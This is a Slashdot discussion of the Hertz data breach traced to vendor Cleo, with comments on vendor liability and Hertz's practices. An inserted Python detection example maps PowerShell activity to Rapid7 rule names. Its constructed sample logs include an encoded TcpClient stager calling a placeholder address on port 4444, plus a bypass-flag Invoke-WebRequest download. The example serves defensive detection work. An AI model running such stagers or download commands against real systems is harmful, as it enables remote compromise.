Privacy Security

Hertz Says Customers' Personal Data, Driver's Licenses Stolen In Data Breach (techcrunch.com)

An anonymous reader quotes a report from TechCrunch: Car rental giant Hertz has begun notifying its customers of a data breach that included their personal information and driver's licenses. The rental company, which also owns the Dollar and Thrifty brands, said in notices on its website that the breach relates to a cyberattack on one of its vendors between October 2024 and December 2024. The stolen data varies by region, but largely includes Hertz customer names, dates of birth, contact information, driver's licenses, payment card information, and workers' compensation claims. Hertz said a smaller number of customers had their Social Security numbers taken in the breach, along with other government-issued identification numbers.

Notices on Hertz's websites disclosed the breach to customers in Australia, Canada, the European Union, New Zealand, and the United Kingdom. Hertz also disclosed the breach to several U.S. states, including California and Maine. Hertz said at least 3,400 customers in Maine were affected but did not list the total number of affected individuals, which is likely to be significantly higher. Emily Spencer, a spokesperson for Hertz, would not provide TechCrunch with a specific number of individuals affected by the breach but said it would be "inaccurate to say millions" of customers are affected. The company attributed the breach to a vendor, software maker Cleo, which last year was at the center of a mass-hacking campaign by a prolific Russia-linked ransomware gang.


  • by Anonymous Coward
    Rather odd data type. Would love to know more about this but I'm sure it's hush hush.
    • "We completed this data analysis on April 2, 2025, and concluded that the personal information involved in this event may
      include the following: name, contact information, date of birth, credit card information, driver’s license information and
      information related to workers’ compensation claims. A very small number of individuals may have had their Social Security
      or other government identification numbers, passport information, Medicare or Medicaid ID (associated with workers’
      compensation c

  • Hm. (Score:3, Insightful)

    by fropenn ( 1116699 ) on Tuesday April 15, 2025 @09:19AM (#65307237)
    A company that can't even effectively run a car rental business now reveals it can't even keep your data private. Big surprise.

    But they essentially have a monopoly at many airports, so if you want to rent a car...?
    • They said the breach was not their fault, it was the fault of a vendor they hired. You expect them to be responsible for who they hire?
      • Subcontractors are still your responsibility but since Hertz is in the hands of its bondholders, they'll say anything to avoid accountability.

      • Pretty sure Target learned this the hard way when they were hacked in 2013 [columbia.edu] thanks to a contractor who maintained their POS devices.

        Then again, at this point, the "P" in "PII" stands for "Publicly."

      • You expect them to be responsible for who they hire?

        Errr yes. Contract competency management is a real thing. The liability lies with the company who contracted out to an incompetent vendor.

      • You expect them to be responsible for who they hire?

        Huh... Yes ?

      • by kmoser ( 1469707 )
        "It wasn't the company's fault, it was the fault of the *employee* who was hired by the *other employee*."
    • But they essentially have a monopoly at many airports, so if you want to rent a car...?

      Do they? I mean I fly around professionally so I've been to many airports, from the world's largest, to airports small enough that you pay the airport tax to a vending machine which gives you a receipt so you can walk past the one security guard at the place.

      I can't say I've ever seen an airport where Hertz was the only option.

      That said Hertz do more than rentals. They have a full logistics service, in that regard they do have a monopoly. If you want a company to do secure transfers through a potentially da

      • Hertz owns Dollar, Thrifty, and Firefly Car Rental; 36% market share behind only Enterprise (which owns Enterprise, Alamo, and National), and ahead of Avis (which owns Avis, Budget, and Payless, and Zipcar). The larger airports will offer more choices, although realistically you are choosing between only 3 companies (despite how many "brands" appear), or you could try one of the local host companies such as Turo; but medium or smaller airports may only have a choice of 1 or 2 of these companies, leaving you
  • by Ogive17 ( 691899 ) on Tuesday April 15, 2025 @09:38AM (#65307283)
    How do we keep having these breaches? It's not the breach that gives me the most concern but the data they were apparently able to extract.

    It's criminal negligence in my opinion.
    • By who? Hertz? How are they criminally negligent? I am sure they can show how their vendor had all the certificates, policies and procedures - as far as they were legally required to verify - in place. I am sure the vendor can do the same. Oh, you are seeing a pattern here?
      • My data and agreements, implicit or explicit, are with Hertz. Everyone should sue them. If Hertz wants to pass the issue onto their contractors, then they are free to attempt to sue them as well.

        Maybe that's an unpleasant amount of litigation. But ultimately we have to settle our disputes in a way that is fair.

    • How do we keep having these breaches? It's not the breach that gives me the most concern by the data they were apparently able to extract.

      It's criminal negligence in my opinion.

      It is. Unfortunately, until the United States adopts actual data privacy standards nothing is going to ever change. In America you wind up having to pay to get taken off bullshit spam "people finder" lists, most of which have horribly inaccurate data to begin with. Spam calls? The FTC has never and will never enforce those rules. Oh, and then they exempt politicians and other groups from the spam restrictions, so come election season I might as well turn my phone off. And the solution is not something like

    • Shit code, uninspired leadership, no accountability. Hertz is failing miserably and the people that work there day to day don't give a shit.

    • Well, I'll say from the technology and implementation side, we need more opinionated standards for federated identity, and open source solutions that are easy to set up and install. Entra is a confusing pile of shit. And don't even get me started on the other enterprise identity providers. Big-IP f5 is legit the worst piece of software I have ever worked with in my entire life. It's such complete shit, in fact, that it's easier to roll your own than to configure it. That's why people roll their own and ge

    • How do we NOT keep having these headaches? No company is safe. Not even one.

      Why do we keep having burglaries, shoplifting, bank robberies, car thefts? Shouldn't we have figured out how to stop these crimes by now? I mean, cars have been around for 100+ years!

      We will continue to have data breaches, as long as we continue to have criminals. It's just crime...on a computer.

  • They seem to be helping themselves to a lot of data that they are prohibited from having by law these days

    • Maybe BigBalls handed DOGE credentials to buddies in Russia. The Trump administration can find a fall guy and lay all the blame on him. They can whisk him away to thier terrorist concentration camp to avoid any unpleasant revelations that would happen in a trial.

  • A few years ago.. (Score:3, Interesting)

    by Anonymous Coward on Tuesday April 15, 2025 @10:04AM (#65307365)

    I worked as a contractor at Hertz a few years ago, trying to undo some of the stupid things that happen when a company goes bankrupt. Their systems are largely undocumented, and most of the people who put the Rube Goldberg device of an infrastructure together were laid off or retired. They're now at the mercy of IT contracting firms trying to untangle it. It'd be better if they scrapped it and started over, but with this breach, I'm not surprised one bit.

    There's also another company CDK that should be on everyone's RADAR. If you've ever bought a car, had service at a dealership, etc. you're in their databases including your PII. Almost every car and power sports dealership uses it.

    It's amazing what kind of shit code and architecture is out there.

  • In the past, because of poor record keeping, they lost some cars. They blamed the last person that rented the car. More than that, they convinced local police to arrest and jail the renter. And if you didn't have bail? Sucks to be you.

    Why on earth the police went along with this was a mystery. I hope the wrongfully imprisoned customers are suing the pants off of hertz and police.

    Now I'm paranoid. Whenever I drop off a car at the airport for any vendor, I take a picture of it in the ret

  • There is a lawyer on YouTube that has all of these insane stories about Hertz customers getting screwed, sometimes years after the fact. Sometimes, I really wonder about how screwed up this company must be for the amount of hate.
  • Not only is the announcement 4 months late, they are going to shift the blame to the lowest bidding bottom feeder so you as a consumer get virtually nothing. I had no choice but to use them for travel because of a corporate contract and they were every bit as fun to deal with then. They would hand you the keys and a smile, then comb over your vehicle with a magnifying glass upon return with $$ in their eyes.
  • by Mirnotoriety ( 10462951 ) on Tuesday April 15, 2025 @10:49AM (#65307495)
    “Cleo is a vendor that provides a file transfer platform [hertz.com] used by Hertz for limited purposes”

    “Cleo Harmony [cleo.com]® provides you with reliable and scalable data communications with the control, governance, and security you need for your internal and external exchanges”

    Dec 10, 2024: Widespread Exploitation of Cleo File Transfer Software (CVE-2024-55956) [rapid7.com]

    “Below is a non-exhaustive list of rules deployed and alerting on behavior related to this threat”:

    * Suspicious Process - XORed Data in PowerShell
    * Suspicious Process - PowerShell System.Net.Sockets.TcpClient
    * Attacker Behavior - Possible Cleo MFT Exploitation 2024
    * Attacker Tool - PowerShell -noni -ep -nop Flags
    * Attacker Behavior - Obfuscated Powershell Script Containing -noni -ep -nop Flags
    * Suspicious Process - Powershell Invoke-WebRequest
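The rule names in that list describe PowerShell behaviours that can be matched against process-creation telemetry, and the encoded-command case is the one that trips up naive string matching. What follows is an added example written for this page, not code from Rapid7, Cleo, Hertz or the commenter: a small Python classifier that assigns those rule names to JSON process-creation records. The regexes, the record format with ParentImage and CommandLine fields, the Cleo install path used to approximate the "Possible Cleo MFT Exploitation" rule (the thread does not say what that rule actually keys on), and every sample record including the 203.0.113.10 documentation address are my own assumptions, not details from the thread or the Rapid7 write-up.

```python
"""Added example: a minimal classifier for the PowerShell behaviours
named in the Rapid7 rule list quoted above. Not Rapid7's or Cleo's
code; the rule names are borrowed from the list, the regexes and the
JSON log format are my own, and every sample record is constructed."""
import base64
import json
import re

FLAGS = ("-noni", "-ep", "-nop")  # -NonInteractive, -ExecutionPolicy, -NoProfile


def has_bypass_flags(cmd):
    """True when a powershell launch carries all three short flags.
    The \\b keeps '-nop' from matching the benign '-NoProfile'."""
    if not re.search(r"(?i)\bpowershell(?:\.exe)?\b", cmd):
        return False
    return all(re.search(r"(?i)(?:^|\s)" + re.escape(f) + r"\b", cmd) for f in FLAGS)


def decode_encoded_command(cmd):
    """Return the script behind -e/-ec/-enc/-EncodedCommand (base64 of
    UTF-16LE), or None. '-ep' is not an encoded-command switch."""
    m = re.search(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(record):
    """Map one process-creation record to the matching rule names."""
    cmd = record.get("CommandLine", "")
    parent = record.get("ParentImage", "")
    decoded = decode_encoded_command(cmd)
    # Scan the decoded body too; otherwise -enc hides everything else.
    text = cmd + ("\n" + decoded if decoded else "")
    hits = []
    flagged = has_bypass_flags(cmd)
    if flagged:
        hits.append("Attacker Tool - PowerShell -noni -ep -nop Flags")
    if flagged and decoded is not None:
        hits.append("Attacker Behavior - Obfuscated Powershell Script Containing -noni -ep -nop Flags")
    if re.search(r"(?i)-bxor\b", text):
        hits.append("Suspicious Process - XORed Data in PowerShell")
    if re.search(r"(?i)System\.Net\.Sockets\.TcpClient", text):
        hits.append("Suspicious Process - PowerShell System.Net.Sockets.TcpClient")
    # 'iwr' must be whitespace-delimited so a base64 blob cannot match it.
    if re.search(r"(?i)(?:\bInvoke-WebRequest\b|(?:^|\s)iwr\b)", text):
        hits.append("Suspicious Process - Powershell Invoke-WebRequest")
    # Assumption: a Cleo install path in the parent image stands in for
    # whatever vendor-specific logic Rapid7's rule really uses.
    if re.search(r"(?i)[\\/]cleo[\\/]", parent) and re.search(r"(?i)\bpowershell", cmd):
        hits.append("Attacker Behavior - Possible Cleo MFT Exploitation 2024")
    return sorted(hits)


def scan(lines):
    """Classify newline-delimited JSON records; one sorted hit list per record."""
    return [classify(json.loads(line)) for line in lines if line.strip()]


# Constructed sample: a TcpClient stager with XOR decoding, as it would
# appear after -EncodedCommand (UTF-16LE, then base64).
_SCRIPT = ("$c=New-Object System.Net.Sockets.TcpClient('203.0.113.10',4444);"
           "$b=$c.GetStream();$d=$b.ReadByte() -bxor 0x41")
_ENC = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_LOG = [  # constructed records, not real telemetry
    json.dumps({"ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem"}),
    json.dumps({"ParentImage": r"C:\Program Files\Cleo\Harmony\jre\bin\javaw.exe",  # assumed path
                "CommandLine": 'powershell.exe -noni -ep bypass -nop -c "Invoke-WebRequest http://203.0.113.10/a.txt"'}),
    json.dumps({"ParentImage": r"C:\Windows\System32\cmd.exe",
                "CommandLine": "powershell -noni -ep bypass -nop -enc " + _ENC}),
]

if __name__ == "__main__":
    for line, hits in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print(json.loads(line)["CommandLine"][:60], "->", hits or ["(clean)"])
```

The point of decoding -EncodedCommand before matching is that the XOR and TcpClient rules fire on the third record only because the base64 body was expanded; matching the raw command line alone would yield only the flag rule. The parent-image check is the weakest link here and is labelled an assumption; in a real deployment it should be replaced by whatever process lineage the MFT product actually exhibits.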
  • [...] a spokesperson for Hertz, would not provide TechCrunch with a specific number of individuals affected by the breach but said it would be “inaccurate to say millions” of customers are affected.

    Interesting how companies are incompetent enough to allow their data to be stolen, but just competent enough to know exactly which records were accessed. If the breach was performed well, forensics will show far fewer records leaked than actually were.

  • These data breaches are getting out of hand. I think it's time:

    1) Laws heavily penalizing companies who get breached.

    2) Customers of companies start suing the hell out of them for data breaches. F! forced arbitration clauses!
  • Hertz is a company notorious for adding surprise charges to rental fees, charging bogus damage claims, and even having customers arrested for auto theft because Hertz failed to log the car returned in their systems. Plus they just have shitty customer service. Data breaches are hardly surprising considering how poorly the companies are run and in particular their systems.

    Dollar and Thrifty are the same company and have the same problems. I never rent from Dollar, Thrifty or Hertz, it's not worth the has
